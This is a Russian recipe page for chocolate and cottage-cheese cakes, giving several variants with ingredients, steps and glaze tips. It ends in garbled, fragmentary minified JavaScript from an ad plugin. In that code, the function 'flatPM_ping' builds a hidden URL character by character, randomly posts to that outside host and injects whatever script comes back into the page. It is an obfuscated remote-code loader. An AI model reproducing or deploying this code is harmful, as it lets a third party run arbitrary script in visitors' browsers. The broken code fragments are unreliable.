Шоколадно-творожный торт

Шоколадно-творожный торт

Шоколад является любимым лакомством многих сладкоежек. Считается, что этот горько-сладкий продукт способен поднимать настроение. В арсенале кондитеров имеется множество рецептов, в которых шоколад выступает одним из главных ингредиентов блюда. Конечно, не все десерты являются полезными. Но если комбинировать сладкий продукт с молочным, можно приготовить аппетитный, а главное полезный десерт. Итак, рассмотрим технологию приготовления шоколадно-творожного торта.

Как приготовить шоколадный торт с творожным кремом

Данный рецепт станет находкой любой хозяйки для угощения дорогих гостей. К любому праздничному столу, творожно-шоколадный торт подойдет идеально. Этот десерт обладает приятным, нежным вкусом, который понравится детям и взрослым. К тому же, это недорогой рецепт, не требующий использования дефицитных продуктов. При желании каждая хозяйка сможет порадовать свою семью роскошным десертом.

Необходимые ингредиенты

Для приготовления тортика потребуется подготовить два набора продуктов. Из одного — будете готовить тесто, а из другого – крем для смазывания коржей. Для теста потребуется:

  • 2 яйца и 200 гр. сахара;
  • 2 столовые ложки сметаны;
  • небольшая пачка маргарина или масла сливочного;
  • 250 гр. творога средней жирности;
  • 100 гр. какао-порошка или плитку черного шоколада;
  • пачка разрыхлителя или ложка соды;
  • 400-500 гр. муки.

Для кремовой пропитки нужно подготовить такие ингредиенты:

  • 250-300 гр. высококачественного сливочного масла;
  • 300 гр. сахара;
  • 100 гр. манной крупы;
  • пол литра молока;
  • 1-2 лимона.

После приготовления всех необходимых продуктов, можно приступать к созданию вкусного десерта.

Пошаговый способ приготовления

Рецепт шоколадно-творожного торта предполагает приготовление в первую очередь теста. Для этого действовать нужно следующим образом:

  1. Взбиваем сахар и яйца, добавляем растопленное масло комнатной температуры. Все компоненты перемешиваем, вводим сметану и разрыхлитель. Последний ингредиент можно заменить ложкой соды, которую перед добавлением в тесто нужно погасить уксусом.
  2. Следующий шаг – добавление в тесто творога, какао-порошка и муки. Чтобы консистенция теста получилась не густая, муку нужно всыпать порционно, каждый раз хорошо перемешивая массу.
  3. Форму для выпечки застилаем пергаментом, смазываем маслом растительным, наливаем тесто, разравнивая по всей емкости.
  4. Выпечка должна провести в духовке не менее получаса при температуре 180 градусов.

После выпекания, извлекаем корж, остужаем до комнатной температуры. Если масса увеличилась вдвое разрезаем заготовку на две части, если втрое – на три равномерных по толщине коржа.

Для пропитки бисквита подготавливаем крем, который состоит из манной каши, приготовленной на молоке с добавлением двух лимонов, натертых целиком на терке. В массу добавляем стакан сахарного песка и чуть подтаявшее сливочное масло. Взбиваем все ингредиенты до получения аппетитного крема, который ставим в холодильник на полчаса. Пропитываем кремом коржи, и укладываем начинку сверху на готовый пирог с творогом.

Видео приготовления шоколадно-творожного торта

Шоколадный десерт с творожно-йогуртовой начинкой

Это потрясающий, очень вкусный шоколадный торт с творогом и йогуртом, который придется по вкусу любителям сладкого. Рекомендуется данный вкусный рецепт взять на заметку мамам с детками. Это блюдо станет отличным выбором для детского сладкого стола ко дню рождения. Для домашнего десерта необходимо приготовить бисквит с добавлением какао-порошка. Сначала взбить яйца, добавить стакан сахара, добавить 200 гр. сметаны, стакан муки, 3 столовые ложки какао и одну чайную ложку соды. После выпечки коржей их нужно разрезать на одинаковые кубики.

Затем готовим крем. Для этого подготавливаем желатиновую массу согласно инструкции на упаковке, и оставляем продукт на некоторое время. 200 гр. йогурта смешиваем с аналогичным количеством сахара и творога. Добавляем в массу, подготовленный желатин.

Для формирования десерта в емкость для выпечки складываем кусочки бисквита, приготовленного с шоколадом на кипятке, заливаем творожно-йогуртовым кремом. Формируем красивое блюдо и отправляем в холодильник часов на 5-6. По завершению этого времени, извлекаем десерт из холодильника, режем на порции и подаем к столу.

Шоколадно-творожный торт с вишневой начинкой

Рецепт шоколадно-творожного торта предполагает приготовление бисквита с добавлением какао, яйца и ванильного сахара. Выпечку можно приготовить в мультиварке, если в вашем распоряжении имеется данное кухонное устройство. Пока бисквит будет остывать, готовим два вида начинки: из творога и из вишни. Для творожной массы смешиваем 400 г творога, 130 г сахара, 400 г сметаны и немного ванильного сахара. Отдельно подготавливаем желатин, залив 15 гр сухого порошка, 75-80 мл воды. Смешиваем желатин и творог, получая однородную массу. Подготавливаем следующий пласт, состоящий из вишни и сахара в соотношении 600 г вишен без косточек и 100 г сахара, и желатина.

Готовим торт в форме для выпекания, собирая блюдо их трех слоев:

  • бисквита;
  • творожной массы;
  • вишни в желатине.

После приготовления отправляем десерт на несколько часов в холодильник для окончательного застывания всех слоев.

Советы к рецепту шоколадно-творожного торта

Для создания творожно-шоколадного торта по рецепту, рекомендуется использовать творог равномерной консистенции. Если такового нет, продукт нужно просеять через сито.

Необязательно использовать для изготовления теста кондитерский разрыхлитель. Этот компонент вполне заменяется содой. Чтобы сделать украшения для торта кондитеры рекомендуют приготовить глазурь. Потребуется смешать:

  • 2 столовые ложки молока;
  • 4 столовые ложки сахарной пудры;
  • столовую ложку сливочного масла;
  • столовую ложку какао-порошка.

Все компоненты смешиваем в кастрюле, которую предварительно устанавливаем на водяную баню. Как только масса достигнет однородности, снимаем ее с водяной бани и в горячем виде поливаем торт.

Пошаговый рецепт шоколадно-творожного торта

Есть остроумный способ накормить ребенка полезным, но не любимым кисломолочным продуктом – это приготовить шоколадно-творожный торт без выпечки или на бисквитном корже.

Прозрачное вишневое желе, светящиеся яркие ягодки, нежное творожное суфле заставят трепетать от нетерпения не только маленького сладкоежку, но и взрослого любителя десертов.

Шоколадный торт без выпечки со свежими вишнями – прекрасное решение для жаркого лета. А возможность использования консервированных или замороженных ягод делает рецепт внесезонным.

Этот десерт можно ничем не украшать, так как прозрачное яркое ягодное желе само по себе – отличное украшение к шоколадному торту с творогом в виде начинки.

Количество продуктов рассчитано на форму диаметром 22 см.

  • Для творожного мусса:
  • Творог (жирность не менее 9%) 300 г.
  • Сметана (жирность не менее 20%) 300 г.
  • Сахарная пудра 80 г.
  • Желатин 5 г.
  • Вода (или молоко) для замачивания желатина 100 мл.
  • Ванильный сахар 8 г.
  • Для вишневого желе:
  • Вишня (свежая) 400 г.
  • Вода 500 мл.
  • Сахар 150 г.
  • Желатин 15 г.
  • Для шоколадной основы:
  • Шоколадное печенье 300 г.
  • Сливочное масло 150 г.

Советы к рецепту

  • Для основы торта можно выбрать не печенье, а подготовленный заранее шоколадный бисквит. Так как нужен очень тонкий слой, приготовьте пирог из половины или трети нормы продуктов, указанной в любимом рецепте. Вишня прекрасно сочетается с выпечкой по рецепту «шоколад на кипятке», классический бисквит из двух яиц тоже станет удачным выбором.
  • Если выбрана бисквитная основа, ее нужно пропитать вишневым сиропом, который можно смешать с вишневым ликером.
  • Если вместо сметаны для начинки творог смешать со сливками, начинка будет вкуснее.
  • Творог нужно использовать комнатной температуры, а сливки или сметану взбивать в холодном состоянии. В момент смешивания все продукты должны быть одинаковой температуры.
  • Вместо сахарного песка лучше взять пудру. Количества сахара нужно регулировать самостоятельно, ориентируясь на собственный вкус и степень кислоты используемых сметаны и творога.
  • Если вы собираете творожно-шоколадный торт с ягодным слоем в неразъемной форме, обязательно выстелите всю ее внутреннюю поверхность пищевой пленкой – так будет легко достать готовый десерт, потянув за края пленки. Затем нужно будет аккуратно избавиться от пленки.
  • Для верхнего слоя можно брать любые ягоды или кусочки фруктов, а не только вишню. Отлично подойдет клубника или консервированные персики.
  • Вместо свежей вишни можно использовать консервированную (без косточек). В этом случае ягоды варить не нужно. Отцедите сок (сироп) и разбавьте его водой до объема 500 мл, приготовьте желе.
  • Вместо желатина ягодный слой можно готовить из порошкового вишневого желе. Прочтите инструкцию на упаковке. На указанное количество ингредиентов нужно взять 2 пачки желе и растворить их в 500 мл горячей воды или вишневого сока (отвара).
  • Вишню на торт лучше выкладывать, образуя сектора – так будет легче красиво разрезать десерт. То есть, нужно вишнями, выложенными в ряд, разделить торт пополам, затем накрест еще раз пополам. После каждую четвертинку снова поделить на две равные части полосами из вишен. Затем образовавшиеся сектора равномерно заполните ягодами.

Творожный крем для шоколадного торта необязательно загущать желатином. Творожная масса достаточно стабильна сама по себе, поэтому ее часто используют для прослойки и покрытия выпечки.

Вот примеры рецептов творожного крема для шоколадного торта:

  1. Разотрите творог (400 г) с сахаром (80 г) и ванилином. Добавьте взбитые сливки (100 мл). Пробейте смесь миксером.
  2. Смешайте сухой творог (300 г), сахар (80 г), греческий йогурт (100 г), сливочный сыр (100 г), взбитые жирные сливки (100 г), перемешайте. Можно добавить 2 взбитых желтка, и перемешать.

Разрежьте подготовленный заранее шоколадный бисквитный пирог на пласты, и промажьте их творожным кремом.

Вдохновляйтесь многообразием способов приготовления вкусной и полезной выпечки, выбирайте свой вариант и радуйте шоколадным тортом с творожной начинкой себя и своих близких!

Творожный торт

Шоколадный торт с творожно-йогуртовым кремом

Кусочки великолепного шоколадного бисквита в обрамлении нежнейшего творожно-йогуртового крема, шоколадная глазурь и нотки смородинового конфитюра… Что может быть вкуснее. Не обращайте внимания, что у меня очень много шагов и много всего написано, такое уж у меня правило, все делать подробно, чтобы в дальнейшем не возникало проблем с приготовлением! Одним словом, как всегда, писала дольше, чем готовила. На самом деле торт очень прост в приготовлении, а результат очень достойный.

Простой торт с нежнейшим творожным кремом

У мамы День рождения, ей исполнилось 86. На своем 80-летии она заявила, что больше дни рождения справлять не будет! На что я ответила ей: “НЕТ, мама! Именно теперь мы будем отмечать КАЖДЫЙ твой День рождения. ” А про себя подумала, а вдруг именно этот – последний. Но, слава Богу, все нормально и очередной ДР отмечен очередным тортом!

Творожно-банановый торт “Маульвурфторте”

Маульвурфторте – это торт Крота. Oчень нежный творожно-банановый торт. На сайте есть похожий, но я хочу вам предложить мой рецепт.

Нежный творожный торт “Семейный”

Очень нежный, воздушный торт. Не отнимает слишком много времени и делается из доступных продуктов! В нашей семье этот торт печется на праздники уже лет 15 и всегда улетает на “Ура”! Смотрела другие рецепты, есть похожие, но такого не нашла! Вот и решила поделиться с вами, дорогие поварята, может, и вам он придется по душе!

Творожный торт “Кофе с лимоном”

Идеальное сочетание! Легкий бисквит, натуральный кофе, свежий лимон и воздушный творог делают этот торт не просто праздником вкуса, но и полезным бодрящим лакомством! Торт “Кофе с лимоном” поднимет тонус и настроение, не навредив фигуре, поскольку не содержит ни капли масла.

Творожный торт “Наслаждение”

Чудесный продукт творог! Предлагаю шикарный рецепт, когда-то нашла его в кулинарных группах, побалуйте себя.

Творожно-черничный торт

Полосатый торт, который готовится предельно просто, порадует вас превосходным вкусом!

Торт без выпечки с творожным кремом

Рецепт торта без выпечки с нежным творожным кремом – очень простой и быстрый в приготовлении.

Творожный торт “Черный трюфель”

Приглашаю всех угоститься этим чудо-волшебным творожным тортиком! Когда готовила, не думала, что будет настолько вкусно.

Творожно-желейный торт с фруктами

Задумала я порадовать сына в его юбилей тортом. Вот только с выпечкой я не очень дружу) Просмотрела рецепты тортов с желатином и решилась… Теперь этот торт уже проверенный))) Т. к. день рождения отмечали в несколько этапов (с мамой-папой, с друзьями, с родственниками), этот торт я готовила уже трижды и, судя по отзывам дегустаторов, буду готовить и дальше. Конечно, опытных кулинаров этим тортом я не удивлю, но, надеюсь, рецепт пригодится тем, кто, также как и я, с выпечкой на «Вы».

Творожный торт. Творожный торт – популярный десерт с творогом, еще одна удачная попытка разнообразить творожное меню.

О пользе творога знают все, поэтому вам не придется доказывать ее окружающим. А вот без уговоров съесть «хотя бы ложечку» можно обойтись с трудом. Впрочем, на кулинарной войне все средства хороши, а вот и мощная «артиллерия» – творожный торт. С его помощью вам не придется уговаривать домочадцев поесть творога – сами набегут, не успеете оглянуться.

Для того чтобы испечь дома творожный торт, вам понадобится довольно жирный творог – 18-процентный или жирнее (сухой не подойдет). В магазине не забудьте оценить внешние качества творога – он должен быть белым или кремовым. Если у продукта слишком кислый запах, от его покупки лучше отказаться.

Перед приготовлением торта творог нужно протереть через сито или взбить. Делается это для того, чтобы получить однородную массу без крупинок. Для ее более насыщенной и нежной смеси можно добавить в торт сливки. Для придания характерного вкуса в творожный торт можно добавлять кусочки фруктов, ванильный сахар, шоколад, сгущенку и, конечно же, разнообразные ягоды, которые особенно восхитительно сочетаются с творогом.

Творожный торт готовится двумя основными способами – выпекается или замораживается.

Если торт готовится без выпечки, первым слоем можно сделать измельченное песочное печенье или зефир.

Для украшения творожного торта можно использовать любую глазурь. Например, шоколадную. Самый простой способ ее приготовления – растопить плитку шоколада на водяной бане.

Шоколадно-творожный торт — варианты приготовления

Незаменимое лакомство и детей и взрослых – шоколад — можно успешно сочетать с таким полезным и нужным для организма продуктом, как творог. Этот дуэт буден уместен, например, в творожно-шоколадных тортах, которые и в праздники и в будни придутся всем по душе. Эта выпечка привлекает своим разнообразием – можно удивлять окружающих тортами на основе легкого бисквита с кремом из творога, а можно и творожными бисквитами. Ну а если совсем не хочется готовить в духовке – торт из печенья выручит всегда.

Шоколадно творожный торт

Полезный в зимние холода шоколадно — творожный торт с необычным лимонным кремом, несомненно, станет фаворитом любителей полезной кухни. Готовится он просто и из доступных продуктов. Основное условие – крем для торта готовится довольно долго, поэтому лучше чередовать его приготовление с выпечкой шоколадно-творожного коржа. Однако обо всем по порядку.

Ингредиенты:

Для теста:

  • 2 яйца, 1 стак. сахара,
  • 100 гр. сметаны,
  • 250 гр. сливочного масла или маргарина,
  • 250 гр. творога,
  • 0.5 стак. какао-порошка,
  • 1 ч.л. соды, 2 стак. муки.

Для крема:

  • 300 гр. слив. масла,
  • 1.5 стак. сахара,
  • 3 ст.л. манки,
  • 2 стак. молока,
  • 2 лимона.

Приготовление:

Готовим тесто

  1. Соединяем яйца с сахаром, вливаем растопленное и охлажденное масло или маргарин, все аккуратно размешиваем, далее вводим сметану и пищевую соду. Соду можно предварительно погасить каплей уксуса или лимонной кислоты, а можно дождаться гашения в сметане, но это менее эффективно.
  2. Далее добавляем творог, какао-порошок, соединяем в однородную массу, последним подсыпаем муку.
  3. Тесто выкладываем в промасленную форму и выпекаем целиком 25-30 минут в духовке при 180–190 °C. Остужаем.
  4. Разрезаем вдоль на два коржа. Если бисквит хорошо поднялся, то можно разрезать на три части, крема будет достаточно и торт получится более пропитанным.

Готовим крем

  1. Основа его манная каша из молока и манки. Варим, остужаем ее и добавляем 2 некрупных лимона натертых вместе с кожурой.
  2. Затем кладем туда мягкое масло с сахаром. Взбиваем крем и ставим в холодильник на 20 минут.

Формируем наш шоколадно — творожный торт

Слои торта выкладываем на блюдо, обильно мажем кремом, оставляем для пропитки хотя бы часа на два, а лучше на ночь.

Шоколадный торт с творожными шариками и курагой

Очень необычный в разрезе да и в приготовлении получается шоколадный торт с творожными шариками. Шарики можно приготовить с начинкой или без, но, если говорить о полезности такого десерта, то лучше в качестве начинки выбрать курагу – и полезно, и сочетание кураги и изюма будет в данном случае идеальным.

Ингредиенты:

Для теста:

  • 0.5 стак. сахара,
  • 4 яйца,
  • 2 ст. л. картофельного крахмала,
  • 50 гр. шоколада,
  • 2 ст. л. муки,
  • 3 ст. л. какао-порошка,
  • щепотка соли,
  • 1 пакетик разрыхлителя;

Для шариков:

  • 200 гр. творога,
  • 2 желтка,
  • 3 ст. л. картофельного крахмала,
  • 1 ч.л. ванильного сахара,
  • 50 гр. кураги.

Для заливки:

  • 2 белка,
  • 50 гр. сахарной пудры.

Приготовление:

Подготовим некоторые продукты

  1. Вначале нужно промыть и вымочить немного курагу, хотя бы минут 10. Затем немного просушить ее на салфетке и порезать мелкими кусочками.
  2. Далее нужно отделить 2 яйца на белки и желтки. Белки ставим в холодное место.
  3. Для теста тоже 4 желтка понадобятся отдельно от белков.
  4. Теперь можно приступать к самому действию – выпечке шоколадного торта с творожными шариками, которые для него и будем готовить в первую очередь.

Готовим творожные шарики

  1. Смешиваем до однородности творог, крахмал, подготовленные желтки и сахар.
  2. Из этой массы формируем лепешки, на каждую кладем чуточку кураги, защипываем края и придаем форму шариков. Шарики делаем небольшого размера – так лучше пропечется.
  3. Готовим форму для выпечки, для данного рецепта лучше взять силиконовую. Шарики укладываем на дно в произвольном порядке.

Готовим жидкое тесто

  1. Вначале взбиваем желтки с сахаром, вливаем растопленный и чуть остуженный шоколад, затем добавляем остальные сыпучие ингредиенты, все перемешиваем и аккуратно вливаем взбитые в пену белки.
  2. Массу мешаем очень осторожно до однородности.
  3. На уложенные шарики заливаем тесто, выпекаем корж 30-40 минут в разогретой до 180–190 °C духовке и остужаем.

Оформляем торт

  1. Сначала взбиваем охлажденные ранее белки с сахарной пудрой до густоты, поливаем немного остывший корж и допекаем в духовке несколько минут.
  2. Затем торт нужно украсить глазурью из растопленного шоколада по собственному усмотрению.

Шоколадный торт с печеньем и творогом

Тортик без выпечки всегда порадует хозяйку простотой приготовления и отличным результатом, а в данном случае еще и полезными свойствами творога.

Ингредиенты:

  • 300 гр. шоколадного печенья,
  • 400 гр. творога,
  • 400 гр. сметаны,
  • 150 гр. сахара,
  • 1 ст.л. желатина,
  • 100 гр. шоколада.

Приготовление:

Готовим заливку

  1. В начале растворим желатин – намочим его в 50 мл холодной воды и после набухания растворим на медленном огне.
  2. В растворенный желатин добавляем взбитые сметану с сахаром и творогом.

Формируем торт

  1. В глубокую форму (лучше подобрать подходящую форме печенья) положим пищевую пленку для удобства формирования торта и начнем укладывать слои печенья, поливая их заливкой.
  2. Такой шоколадный торт с творогом нужно подержать в холодильнике несколько часов до застывания желатина.
  3. В заключение выложим его аккуратно на блюдо и польем растопленным шоколадом или глазурью, которую приготовим в следующем рецепте.

Шоколадный торт с творожно-йогуртовым кремом

Данный торт привлекателен нежным шоколадным бисквитом и кремом из творога и йогурта и конечно минимумом ингредиентов. Прекрасный десерт для детской компании и не только.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};